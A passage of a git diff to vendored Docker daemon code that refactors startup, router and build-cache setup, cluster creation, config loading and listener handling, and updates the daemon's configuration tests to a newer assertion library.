serverConfig, pluginStore); err != nil { + logrus.Fatalf("Error creating middlewares: %v", err) + } + + d, err := daemon.NewDaemon(cli.Config, registryService, containerdRemote, pluginStore) if err != nil { return fmt.Errorf("Error starting daemon: %v", err) } + d.StoreHosts(hosts) + + // validate after NewDaemon has restored enabled plugins. Dont change order. + if err := validateAuthzPlugins(cli.Config.AuthorizationPlugins, pluginStore); err != nil { + return fmt.Errorf("Error validating authorization plugin: %v", err) + } + + // TODO: move into startMetricsServer() if cli.Config.MetricsAddress != "" { if !d.HasExperimental() { return fmt.Errorf("metrics-addr is only supported when experimental is enabled") @@ -274,18 +184,9 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) { } } - name, _ := os.Hostname() - - c, err := cluster.New(cluster.Config{ - Root: cli.Config.Root, - Name: name, - Backend: d, - NetworkSubnetsProvider: d, - DefaultAdvertiseAddr: cli.Config.SwarmDefaultAdvertiseAddr, - RuntimeRoot: cli.getSwarmRunRoot(), - }) + c, err := createAndStartCluster(cli, d) if err != nil { - logrus.Fatalf("Error creating cluster component: %v", err) + logrus.Fatalf("Error starting cluster component: %v", err) } // Restart all autostart containers which has a swarm endpoint @@ -295,20 +196,21 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) { logrus.Info("Daemon has completed initialization") - logrus.WithFields(logrus.Fields{ - "version": dockerversion.Version, - "commit": dockerversion.GitCommit, - "graphdriver": d.GraphDriverName(), - }).Info("Docker daemon") - cli.d = d - // initMiddlewares needs cli.d to be populated. Dont change this init order. - if err := cli.initMiddlewares(api, serverConfig); err != nil { - logrus.Fatalf("Error creating middlewares: %v", err) + routerOptions, err := newRouterOptions(cli.Config, d) + if err != nil { + return err } - d.SetCluster(c) - initRouter(api, d, c) + routerOptions.api = cli.api + routerOptions.cluster = c + + initRouter(routerOptions) + + // process cluster change notifications + watchCtx, cancel := context.WithCancel(context.Background()) + defer cancel() + go d.ProcessClusterNotifications(watchCtx, c.GetWatchStream()) cli.setupConfigReloadTrap() @@ -316,7 +218,7 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) { // We need to start it as a goroutine and wait on it so // daemon doesn't exit serveAPIWait := make(chan error) - go api.Wait(serveAPIWait) + go cli.api.Wait(serveAPIWait) // after the daemon is done setting up we can notify systemd api notifySystem() @@ -334,36 +236,105 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) { return nil } +type routerOptions struct { + sessionManager *session.Manager + buildBackend *buildbackend.Backend + buildCache *fscache.FSCache // legacy + buildkit *buildkit.Builder + daemon *daemon.Daemon + api *apiserver.Server + cluster *cluster.Cluster +} + +func newRouterOptions(config *config.Config, daemon *daemon.Daemon) (routerOptions, error) { + opts := routerOptions{} + sm, err := session.NewManager() + if err != nil { + return opts, errors.Wrap(err, "failed to create sessionmanager") + } + + builderStateDir := filepath.Join(config.Root, "builder") + + buildCache, err := fscache.NewFSCache(fscache.Opt{ + Backend: fscache.NewNaiveCacheBackend(builderStateDir), + Root: builderStateDir, + GCPolicy: fscache.GCPolicy{ // TODO: expose this in config + MaxSize: 1024 * 1024 * 512, // 512MB + MaxKeepDuration: 7 * 24 * time.Hour, // 1 week + }, + }) + if err != nil { + return opts, errors.Wrap(err, "failed to create fscache") + } + + manager, err := dockerfile.NewBuildManager(daemon.BuilderBackend(), sm, buildCache, daemon.IDMappings()) + if err != nil { + return opts, err + } + + buildkit, err := buildkit.New(buildkit.Opt{ + SessionManager: sm, + Root: filepath.Join(config.Root, "buildkit"), + Dist: daemon.DistributionServices(), + }) + if err != nil { + return opts, err + } + + bb, err := buildbackend.NewBackend(daemon.ImageService(), manager, buildCache, buildkit) + if err != nil { + return opts, errors.Wrap(err, "failed to create buildmanager") + } + + return routerOptions{ + sessionManager: sm, + buildBackend: bb, + buildCache: buildCache, + buildkit: buildkit, + daemon: daemon, + }, nil +} + func (cli *DaemonCli) reloadConfig() { - reload := func(config *daemon.Config) { + reload := func(c *config.Config) { // Revalidate and reload the authorization plugins - if err := validateAuthzPlugins(config.AuthorizationPlugins, cli.d.PluginStore); err != nil { + if err := validateAuthzPlugins(c.AuthorizationPlugins, cli.d.PluginStore); err != nil { logrus.Fatalf("Error validating authorization plugin: %v", err) return } - cli.authzMiddleware.SetPlugins(config.AuthorizationPlugins) + cli.authzMiddleware.SetPlugins(c.AuthorizationPlugins) + + // The namespaces com.docker.*, io.docker.*, org.dockerproject.* have been documented + // to be reserved for Docker's internal use, but this was never enforced. Allowing + // configured labels to use these namespaces are deprecated for 18.05. + // + // The following will check the usage of such labels, and report a warning for deprecation. + // + // TODO: At the next stable release, the validation should be folded into the other + // configuration validation functions and an error will be returned instead, and this + // block should be deleted. + if err := config.ValidateReservedNamespaceLabels(c.Labels); err != nil { + logrus.Warnf("Configured labels using reserved namespaces is deprecated: %s", err) + } - if err := cli.d.Reload(config); err != nil { + if err := cli.d.Reload(c); err != nil { logrus.Errorf("Error reconfiguring the daemon: %v", err) return } - if config.IsValueSet("debug") { - debugEnabled := utils.IsDebugEnabled() + if c.IsValueSet("debug") { + debugEnabled := debug.IsEnabled() switch { - case debugEnabled && !config.Debug: // disable debug - utils.DisableDebug() - cli.api.DisableProfiler() - case config.Debug && !debugEnabled: // enable debug - utils.EnableDebug() - cli.api.EnableProfiler() + case debugEnabled && !c.Debug: // disable debug + debug.Disable() + case c.Debug && !debugEnabled: // enable debug + debug.Enable() } - } } - if err := daemon.ReloadConfiguration(*cli.configFile, cli.flags, reload); err != nil { + if err := config.Reload(*cli.configFile, cli.flags, reload); err != nil { logrus.Error(err) } } @@ -395,89 +366,118 @@ func shutdownDaemon(d *daemon.Daemon) { } } -func loadDaemonCliConfig(opts daemonOptions) (*daemon.Config, error) { - config := opts.daemonConfig +func loadDaemonCliConfig(opts *daemonOptions) (*config.Config, error) { + conf := opts.daemonConfig flags := opts.flags - config.Debug = opts.common.Debug - config.Hosts = opts.common.Hosts - config.LogLevel = opts.common.LogLevel - config.TLS = opts.common.TLS - config.TLSVerify = opts.common.TLSVerify - config.CommonTLSOptions = daemon.CommonTLSOptions{} + conf.Debug = opts.Debug + conf.Hosts = opts.Hosts + conf.LogLevel = opts.LogLevel + conf.TLS = opts.TLS + conf.TLSVerify = opts.TLSVerify + conf.CommonTLSOptions = config.CommonTLSOptions{} + + if opts.TLSOptions != nil { + conf.CommonTLSOptions.CAFile = opts.TLSOptions.CAFile + conf.CommonTLSOptions.CertFile = opts.TLSOptions.CertFile + conf.CommonTLSOptions.KeyFile = opts.TLSOptions.KeyFile + } - if opts.common.TLSOptions != nil { - config.CommonTLSOptions.CAFile = opts.common.TLSOptions.CAFile - config.CommonTLSOptions.CertFile = opts.common.TLSOptions.CertFile - config.CommonTLSOptions.KeyFile = opts.common.TLSOptions.KeyFile + if conf.TrustKeyPath == "" { + conf.TrustKeyPath = filepath.Join( + getDaemonConfDir(conf.Root), + defaultTrustKeyFile) + } + + if flags.Changed("graph") && flags.Changed("data-root") { + return nil, fmt.Errorf(`cannot specify both "--graph" and "--data-root" option`) } if opts.configFile != "" { - c, err := daemon.MergeDaemonConfigurations(config, flags, opts.configFile) + c, err := config.MergeDaemonConfigurations(conf, flags, opts.configFile) if err != nil { - if flags.Changed(flagDaemonConfigFile) || !os.IsNotExist(err) { - return nil, fmt.Errorf("unable to configure the Docker daemon with file %s: %v\n", opts.configFile, err) + if flags.Changed("config-file") || !os.IsNotExist(err) { + return nil, fmt.Errorf("unable to configure the Docker daemon with file %s: %v", opts.configFile, err) } } // the merged configuration can be nil if the config file didn't exist. // leave the current configuration as it is if when that happens. if c != nil { - config = c + conf = c } } - if err := daemon.ValidateConfiguration(config); err != nil { + if err := config.Validate(conf); err != nil { return nil, err } - // Labels of the docker engine used to allow multiple values associated with the same key. - // This is deprecated in 1.13, and, be removed after 3 release cycles. - // The following will check the conflict of labels, and report a warning for deprecation. - // - // TODO: After 3 release cycles (1.16) an error will be returned, and labels will be - // sanitized to consolidate duplicate key-value pairs (config.Labels = newLabels): + if runtime.GOOS != "windows" { + if flags.Changed("disable-legacy-registry") { + // TODO: Remove this error after 3 release cycles (18.03) + return nil, errors.New("ERROR: The '--disable-legacy-registry' flag has been removed. Interacting with legacy (v1) registries is no longer supported") + } + if !conf.V2Only { + // TODO: Remove this error after 3 release cycles (18.03) + return nil, errors.New("ERROR: The 'disable-legacy-registry' configuration option has been removed. Interacting with legacy (v1) registries is no longer supported") + } + } + + if flags.Changed("graph") { + logrus.Warnf(`The "-g / --graph" flag is deprecated. Please use "--data-root" instead`) + } + + // Check if duplicate label-keys with different values are found + newLabels, err := config.GetConflictFreeLabels(conf.Labels) + if err != nil { + return nil, err + } + // The namespaces com.docker.*, io.docker.*, org.dockerproject.* have been documented + // to be reserved for Docker's internal use, but this was never enforced. Allowing + // configured labels to use these namespaces are deprecated for 18.05. // - // newLabels, err := daemon.GetConflictFreeLabels(config.Labels) - // if err != nil { - // return nil, err - // } - // config.Labels = newLabels + // The following will check the usage of such labels, and report a warning for deprecation. // - if _, err := daemon.GetConflictFreeLabels(config.Labels); err != nil { - logrus.Warnf("Engine labels with duplicate keys and conflicting values have been deprecated: %s", err) + // TODO: At the next stable release, the validation should be folded into the other + // configuration validation functions and an error will be returned instead, and this + // block should be deleted. + if err := config.ValidateReservedNamespaceLabels(newLabels); err != nil { + logrus.Warnf("Configured labels using reserved namespaces is deprecated: %s", err) } + conf.Labels = newLabels // Regardless of whether the user sets it to true or false, if they // specify TLSVerify at all then we need to turn on TLS - if config.IsValueSet(cliflags.FlagTLSVerify) { - config.TLS = true + if conf.IsValueSet(FlagTLSVerify) { + conf.TLS = true } // ensure that the log level is the one set after merging configurations - cliflags.SetLogLevel(config.LogLevel) + setLogLevel(conf.LogLevel) - return config, nil + return conf, nil } -func initRouter(s *apiserver.Server, d *daemon.Daemon, c *cluster.Cluster) { +func initRouter(opts routerOptions) { decoder := runconfig.ContainerDecoder{} routers := []router.Router{ // we need to add the checkpoint router before the container router or the DELETE gets masked - checkpointrouter.NewRouter(d, decoder), - container.NewRouter(d, decoder), - image.NewRouter(d, decoder), - systemrouter.NewRouter(d, c), - volume.NewRouter(d), - build.NewRouter(dockerfile.NewBuildManager(d)), - swarmrouter.NewRouter(c), - pluginrouter.NewRouter(d.PluginManager()), + checkpointrouter.NewRouter(opts.daemon, decoder), + container.NewRouter(opts.daemon, decoder), + image.NewRouter(opts.daemon.ImageService()), + systemrouter.NewRouter(opts.daemon, opts.cluster, opts.buildCache, opts.buildkit), + volume.NewRouter(opts.daemon.VolumesService()), + build.NewRouter(opts.buildBackend, opts.daemon), + sessionrouter.NewRouter(opts.sessionManager), + swarmrouter.NewRouter(opts.cluster), + pluginrouter.NewRouter(opts.daemon.PluginManager()), + distributionrouter.NewRouter(opts.daemon.ImageService()), } - if d.NetworkControllerEnabled() { - routers = append(routers, network.NewRouter(d, c)) + if opts.daemon.NetworkControllerEnabled() { + routers = append(routers, network.NewRouter(opts.daemon, opts.cluster)) } - if d.HasExperimental() { + if opts.daemon.HasExperimental() { for _, r := range routers { for _, route := range r.Routes() { if experimental, ok := route.(router.ExperimentalRoute); ok { @@ -487,36 +487,150 @@ func initRouter(s *apiserver.Server, d *daemon.Daemon, c *cluster.Cluster) { } } - s.InitRouter(utils.IsDebugEnabled(), routers...) + opts.api.InitRouter(routers...) } -func (cli *DaemonCli) initMiddlewares(s *apiserver.Server, cfg *apiserver.Config) error { +// TODO: remove this from cli and return the authzMiddleware +func (cli *DaemonCli) initMiddlewares(s *apiserver.Server, cfg *apiserver.Config, pluginStore plugingetter.PluginGetter) error { v := cfg.Version - exp := middleware.NewExperimentalMiddleware(cli.d.HasExperimental()) + exp := middleware.NewExperimentalMiddleware(cli.Config.Experimental) s.UseMiddleware(exp) vm := middleware.NewVersionMiddleware(v, api.DefaultVersion, api.MinVersion) s.UseMiddleware(vm) - if cfg.EnableCors { + if cfg.CorsHeaders != "" { c := middleware.NewCORSMiddleware(cfg.CorsHeaders) s.UseMiddleware(c) } - if err := validateAuthzPlugins(cli.Config.AuthorizationPlugins, cli.d.PluginStore); err != nil { - return fmt.Errorf("Error validating authorization plugin: %v", err) - } - cli.authzMiddleware = authorization.NewMiddleware(cli.Config.AuthorizationPlugins, cli.d.PluginStore) + cli.authzMiddleware = authorization.NewMiddleware(cli.Config.AuthorizationPlugins, pluginStore) + cli.Config.AuthzMiddleware = cli.authzMiddleware s.UseMiddleware(cli.authzMiddleware) return nil } +func (cli *DaemonCli) getRemoteOptions() ([]libcontainerd.RemoteOption, error) { + opts := []libcontainerd.RemoteOption{} + + pOpts, err := cli.getPlatformRemoteOptions() + if err != nil { + return nil, err + } + opts = append(opts, pOpts...) + return opts, nil +} + +func newAPIServerConfig(cli *DaemonCli) (*apiserver.Config, error) { + serverConfig := &apiserver.Config{ + Logging: true, + SocketGroup: cli.Config.SocketGroup, + Version: dockerversion.Version, + CorsHeaders: cli.Config.CorsHeaders, + } + + if cli.Config.TLS { + tlsOptions := tlsconfig.Options{ + CAFile: cli.Config.CommonTLSOptions.CAFile, + CertFile: cli.Config.CommonTLSOptions.CertFile, + KeyFile: cli.Config.CommonTLSOptions.KeyFile, + ExclusiveRootPools: true, + } + + if cli.Config.TLSVerify { + // server requires and verifies client's certificate + tlsOptions.ClientAuth = tls.RequireAndVerifyClientCert + } + tlsConfig, err := tlsconfig.Server(tlsOptions) + if err != nil { + return nil, err + } + serverConfig.TLSConfig = tlsConfig + } + + if len(cli.Config.Hosts) == 0 { + cli.Config.Hosts = make([]string, 1) + } + + return serverConfig, nil +} + +func loadListeners(cli *DaemonCli, serverConfig *apiserver.Config) ([]string, error) { + var hosts []string + for i := 0; i < len(cli.Config.Hosts); i++ { + var err error + if cli.Config.Hosts[i], err = dopts.ParseHost(cli.Config.TLS, cli.Config.Hosts[i]); err != nil { + return nil, fmt.Errorf("error parsing -H %s : %v", cli.Config.Hosts[i], err) + } + + protoAddr := cli.Config.Hosts[i] + protoAddrParts := strings.SplitN(protoAddr, "://", 2) + if len(protoAddrParts) != 2 { + return nil, fmt.Errorf("bad format %s, expected PROTO://ADDR", protoAddr) + } + + proto := protoAddrParts[0] + addr := protoAddrParts[1] + + // It's a bad idea to bind to TCP without tlsverify. + if proto == "tcp" && (serverConfig.TLSConfig == nil || serverConfig.TLSConfig.ClientAuth != tls.RequireAndVerifyClientCert) { + logrus.Warn("[!] DON'T BIND ON ANY IP ADDRESS WITHOUT setting --tlsverify IF YOU DON'T KNOW WHAT YOU'RE DOING [!]") + } + ls, err := listeners.Init(proto, addr, serverConfig.SocketGroup, serverConfig.TLSConfig) + if err != nil { + return nil, err + } + ls = wrapListeners(proto, ls) + // If we're binding to a TCP port, make sure that a container doesn't try to use it. + if proto == "tcp" { + if err := allocateDaemonPort(addr); err != nil { + return nil, err + } + } + logrus.Debugf("Listener created for HTTP on %s (%s)", proto, addr) + hosts = append(hosts, protoAddrParts[1]) + cli.api.Accept(addr, ls...) + } + + return hosts, nil +} + +func createAndStartCluster(cli *DaemonCli, d *daemon.Daemon) (*cluster.Cluster, error) { + name, _ := os.Hostname() + + // Use a buffered channel to pass changes from store watch API to daemon + // A buffer allows store watch API and daemon processing to not wait for each other + watchStream := make(chan *swarmapi.WatchMessage, 32) + + c, err := cluster.New(cluster.Config{ + Root: cli.Config.Root, + Name: name, + Backend: d, + VolumeBackend: d.VolumesService(), + ImageBackend: d.ImageService(), + PluginBackend: d.PluginManager(), + NetworkSubnetsProvider: d, + DefaultAdvertiseAddr: cli.Config.SwarmDefaultAdvertiseAddr, + RaftHeartbeatTick: cli.Config.SwarmRaftHeartbeatTick, + RaftElectionTick: cli.Config.SwarmRaftElectionTick, + RuntimeRoot: cli.getSwarmRunRoot(), + WatchStream: watchStream, + }) + if err != nil { + return nil, err + } + d.SetCluster(c) + err = c.Start() + + return c, err +} + // validates that the plugins requested with the --authorization-plugin flag are valid AuthzDriver // plugins present on the host and available to the daemon func validateAuthzPlugins(requestedPlugins []string, pg plugingetter.PluginGetter) error { for _, reqPlugin := range requestedPlugins { - if _, err := pg.Get(reqPlugin, authorization.AuthZApiImplements, plugingetter.LOOKUP); err != nil { + if _, err := pg.Get(reqPlugin, authorization.AuthZApiImplements, plugingetter.Lookup); err != nil { return err } } diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go index 623aaf4b09..6d013b8103 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go @@ -1,5 +1,9 @@ package main +// preNotifySystem sends a message to the host when the API is active, but before the daemon is +func preNotifySystem() { +} + // notifySystem sends a message to the host when the server is ready to be used func notifySystem() { } diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go index a556daa187..cf2d65275f 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go @@ -1,11 +1,13 @@ -// +build linux - package main import systemdDaemon "github.com/coreos/go-systemd/daemon" +// preNotifySystem sends a message to the host when the API is active, but before the daemon is +func preNotifySystem() { +} + // notifySystem sends a message to the host when the server is ready to be used func notifySystem() { // Tell the init daemon we are accepting requests - go systemdDaemon.SdNotify("READY=1") + go systemdDaemon.SdNotify(false, systemdDaemon.SdNotifyReady) } diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go deleted file mode 100644 index 974ba16345..0000000000 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go +++ /dev/null @@ -1,85 +0,0 @@ -// +build solaris - -package main - -import ( - "fmt" - "net" - "os" - "path/filepath" - "syscall" - - "github.com/docker/docker/libcontainerd" - "github.com/docker/docker/pkg/system" -) - -const defaultDaemonConfigFile = "" - -// currentUserIsOwner checks whether the current user is the owner of the given -// file. -func currentUserIsOwner(f string) bool { - if fileInfo, err := system.Stat(f); err == nil && fileInfo != nil { - if int(fileInfo.UID()) == os.Getuid() { - return true - } - } - return false -} - -// setDefaultUmask sets the umask to 0022 to avoid problems -// caused by custom umask -func setDefaultUmask() error { - desiredUmask := 0022 - syscall.Umask(desiredUmask) - if umask := syscall.Umask(desiredUmask); umask != desiredUmask { - return fmt.Errorf("failed to set umask: expected %#o, got %#o", desiredUmask, umask) - } - - return nil -} - -func getDaemonConfDir(_ string) string { - return "/etc/docker" -} - -// setupConfigReloadTrap configures the USR2 signal to reload the configuration. -func (cli *DaemonCli) setupConfigReloadTrap() { -} - -// notifySystem sends a message to the host when the server is ready to be used -func notifySystem() { -} - -func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption { - opts := []libcontainerd.RemoteOption{} - if cli.Config.ContainerdAddr != "" { - opts = append(opts, libcontainerd.WithRemoteAddr(cli.Config.ContainerdAddr)) - } else { - opts = append(opts, libcontainerd.WithStartDaemon(true)) - } - return opts -} - -// getLibcontainerdRoot gets the root directory for libcontainerd/containerd to -// store their state. -func (cli *DaemonCli) getLibcontainerdRoot() string { - return filepath.Join(cli.Config.ExecRoot, "libcontainerd") -} - -// getSwarmRunRoot gets the root directory for swarm to store runtime state -// For example, the control socket -func (cli *DaemonCli) getSwarmRunRoot() string { - return filepath.Join(cli.Config.ExecRoot, "swarm") -} - -func allocateDaemonPort(addr string) error { - return nil -} - -// notifyShutdown is called after the daemon shuts down but before the process exits. -func notifyShutdown(err error) { -} - -func wrapListeners(proto string, ls []net.Listener) []net.Listener { - return ls -} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go index b364f87843..ad447e3b90 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go @@ -3,34 +3,31 @@ package main import ( "testing" - "github.com/Sirupsen/logrus" - cliflags "github.com/docker/docker/cli/flags" - "github.com/docker/docker/daemon" - "github.com/docker/docker/pkg/testutil/assert" - "github.com/docker/docker/pkg/testutil/tempfile" + "github.com/docker/docker/daemon/config" + "github.com/sirupsen/logrus" "github.com/spf13/pflag" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" ) -func defaultOptions(configFile string) daemonOptions { - opts := daemonOptions{ - daemonConfig: &daemon.Config{}, - flags: &pflag.FlagSet{}, - common: cliflags.NewCommonOptions(), - } - opts.common.InstallFlags(opts.flags) - opts.daemonConfig.InstallFlags(opts.flags) - opts.flags.StringVar(&opts.configFile, flagDaemonConfigFile, defaultDaemonConfigFile, "") +func defaultOptions(configFile string) *daemonOptions { + opts := newDaemonOptions(&config.Config{}) + opts.flags = &pflag.FlagSet{} + opts.InstallFlags(opts.flags) + installConfigFlags(opts.daemonConfig, opts.flags) + opts.flags.StringVar(&opts.configFile, "config-file", defaultDaemonConfigFile, "") opts.configFile = configFile return opts } func TestLoadDaemonCliConfigWithoutOverriding(t *testing.T) { opts := defaultOptions("") - opts.common.Debug = true + opts.Debug = true loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) + assert.Assert(t, loadedConfig != nil) if !loadedConfig.Debug { t.Fatalf("expected debug to be copied from the common flags, got false") } @@ -38,108 +35,148 @@ func TestLoadDaemonCliConfigWithoutOverriding(t *testing.T) { func TestLoadDaemonCliConfigWithTLS(t *testing.T) { opts := defaultOptions("") - opts.common.TLSOptions.CAFile = "/tmp/ca.pem" - opts.common.TLS = true + opts.TLSOptions.CAFile = "/tmp/ca.pem" + opts.TLS = true loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.Equal(t, loadedConfig.CommonTLSOptions.CAFile, "/tmp/ca.pem") + assert.Assert(t, loadedConfig != nil) + assert.Check(t, is.Equal("/tmp/ca.pem", loadedConfig.CommonTLSOptions.CAFile)) } func TestLoadDaemonCliConfigWithConflicts(t *testing.T) { - tempFile := tempfile.NewTempFile(t, "config", `{"labels": ["l3=foo"]}`) + tempFile := fs.NewFile(t, "config", fs.WithContent(`{"labels": ["l3=foo"]}`)) + defer tempFile.Remove() + configFile := tempFile.Path() + + opts := defaultOptions(configFile) + flags := opts.flags + + assert.Check(t, flags.Set("config-file", configFile)) + assert.Check(t, flags.Set("label", "l1=bar")) + assert.Check(t, flags.Set("label", "l2=baz")) + + _, err := loadDaemonCliConfig(opts) + assert.Check(t, is.ErrorContains(err, "as a flag and in the configuration file: labels")) +} + +func TestLoadDaemonCliWithConflictingNodeGenericResources(t *testing.T) { + tempFile := fs.NewFile(t, "config", fs.WithContent(`{"node-generic-resources": ["foo=bar", "bar=baz"]}`)) defer tempFile.Remove() - configFile := tempFile.Name() + configFile := tempFile.Path() opts := defaultOptions(configFile) flags := opts.flags - assert.NilError(t, flags.Set(flagDaemonConfigFile, configFile)) - assert.NilError(t, flags.Set("label", "l1=bar")) - assert.NilError(t, flags.Set("label", "l2=baz")) + assert.Check(t, flags.Set("config-file", configFile)) + assert.Check(t, flags.Set("node-generic-resource", "r1=bar")) + assert.Check(t, flags.Set("node-generic-resource", "r2=baz")) + + _, err := loadDaemonCliConfig(opts) + assert.Check(t, is.ErrorContains(err, "as a flag and in the configuration file: node-generic-resources")) +} + +func TestLoadDaemonCliWithConflictingLabels(t *testing.T) { + opts := defaultOptions("") + flags := opts.flags + + assert.Check(t, flags.Set("label", "foo=bar")) + assert.Check(t, flags.Set("label", "foo=baz")) + + _, err := loadDaemonCliConfig(opts) + assert.Check(t, is.Error(err, "conflict labels for foo=baz and foo=bar")) +} + +func TestLoadDaemonCliWithDuplicateLabels(t *testing.T) { + opts := defaultOptions("") + flags := opts.flags + + assert.Check(t, flags.Set("label", "foo=the-same")) + assert.Check(t, flags.Set("label", "foo=the-same")) _, err := loadDaemonCliConfig(opts) - assert.Error(t, err, "as a flag and in the configuration file: labels") + assert.Check(t, err) } func TestLoadDaemonCliConfigWithTLSVerify(t *testing.T) { - tempFile := tempfile.NewTempFile(t, "config", `{"tlsverify": true}`) + tempFile := fs.NewFile(t, "config", fs.WithContent(`{"tlsverify": true}`)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) - opts.common.TLSOptions.CAFile = "/tmp/ca.pem" + opts := defaultOptions(tempFile.Path()) + opts.TLSOptions.CAFile = "/tmp/ca.pem" loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.Equal(t, loadedConfig.TLS, true) + assert.Assert(t, loadedConfig != nil) + assert.Check(t, is.Equal(loadedConfig.TLS, true)) } func TestLoadDaemonCliConfigWithExplicitTLSVerifyFalse(t *testing.T) { - tempFile := tempfile.NewTempFile(t, "config", `{"tlsverify": false}`) + tempFile := fs.NewFile(t, "config", fs.WithContent(`{"tlsverify": false}`)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) - opts.common.TLSOptions.CAFile = "/tmp/ca.pem" + opts := defaultOptions(tempFile.Path()) + opts.TLSOptions.CAFile = "/tmp/ca.pem" loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.Equal(t, loadedConfig.TLS, true) + assert.Assert(t, loadedConfig != nil) + assert.Check(t, loadedConfig.TLS) } func TestLoadDaemonCliConfigWithoutTLSVerify(t *testing.T) { - tempFile := tempfile.NewTempFile(t, "config", `{}`) + tempFile := fs.NewFile(t, "config", fs.WithContent(`{}`)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) - opts.common.TLSOptions.CAFile = "/tmp/ca.pem" + opts := defaultOptions(tempFile.Path()) + opts.TLSOptions.CAFile = "/tmp/ca.pem" loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.Equal(t, loadedConfig.TLS, false) + assert.Assert(t, loadedConfig != nil) + assert.Check(t, !loadedConfig.TLS) } func TestLoadDaemonCliConfigWithLogLevel(t *testing.T) { - tempFile := tempfile.NewTempFile(t, "config", `{"log-level": "warn"}`) + tempFile := fs.NewFile(t, "config", fs.WithContent(`{"log-level": "warn"}`)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) + opts := defaultOptions(tempFile.Path()) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.Equal(t, loadedConfig.LogLevel, "warn") - assert.Equal(t, logrus.GetLevel(), logrus.WarnLevel) + assert.Assert(t, loadedConfig != nil) + assert.Check(t, is.Equal("warn", loadedConfig.LogLevel)) + assert.Check(t, is.Equal(logrus.WarnLevel, logrus.GetLevel())) } func TestLoadDaemonConfigWithEmbeddedOptions(t *testing.T) { content := `{"tlscacert": "/etc/certs/ca.pem", "log-driver": "syslog"}` - tempFile := tempfile.NewTempFile(t, "config", content) + tempFile := fs.NewFile(t, "config", fs.WithContent(content)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) + opts := defaultOptions(tempFile.Path()) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.Equal(t, loadedConfig.CommonTLSOptions.CAFile, "/etc/certs/ca.pem") - assert.Equal(t, loadedConfig.LogConfig.Type, "syslog") + assert.Assert(t, loadedConfig != nil) + assert.Check(t, is.Equal("/etc/certs/ca.pem", loadedConfig.CommonTLSOptions.CAFile)) + assert.Check(t, is.Equal("syslog", loadedConfig.LogConfig.Type)) } func TestLoadDaemonConfigWithRegistryOptions(t *testing.T) { content := `{ + "allow-nondistributable-artifacts": ["allow-nondistributable-artifacts.com"], "registry-mirrors": ["https://mirrors.docker.com"], "insecure-registries": ["https://insecure.docker.com"] }` - tempFile := tempfile.NewTempFile(t, "config", content) + tempFile := fs.NewFile(t, "config", fs.WithContent(content)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) + opts := defaultOptions(tempFile.Path()) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) + assert.Assert(t, loadedConfig != nil) - assert.Equal(t, len(loadedConfig.Mirrors), 1) - assert.Equal(t, len(loadedConfig.InsecureRegistries), 1) + assert.Check(t, is.Len(loadedConfig.AllowNondistributableArtifacts, 1)) + assert.Check(t, is.Len(loadedConfig.Mirrors, 1)) + assert.Check(t, is.Len(loadedConfig.InsecureRegistries, 1)) } diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go index bdce98bd26..2561baa774 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go @@ -1,4 +1,4 @@ -// +build !windows,!solaris +// +build !windows package main @@ -9,34 +9,23 @@ import ( "os/signal" "path/filepath" "strconv" - "syscall" + "github.com/containerd/containerd/runtime/linux" "github.com/docker/docker/cmd/dockerd/hack" "github.com/docker/docker/daemon" "github.com/docker/docker/libcontainerd" - "github.com/docker/docker/pkg/system" "github.com/docker/libnetwork/portallocator" + "golang.org/x/sys/unix" ) const defaultDaemonConfigFile = "/etc/docker/daemon.json" -// currentUserIsOwner checks whether the current user is the owner of the given -// file. -func currentUserIsOwner(f string) bool { - if fileInfo, err := system.Stat(f); err == nil && fileInfo != nil { - if int(fileInfo.UID()) == os.Getuid() { - return true - } - } - return false -} - // setDefaultUmask sets the umask to 0022 to avoid problems // caused by custom umask func setDefaultUmask() error { desiredUmask := 0022 - syscall.Umask(desiredUmask) - if umask := 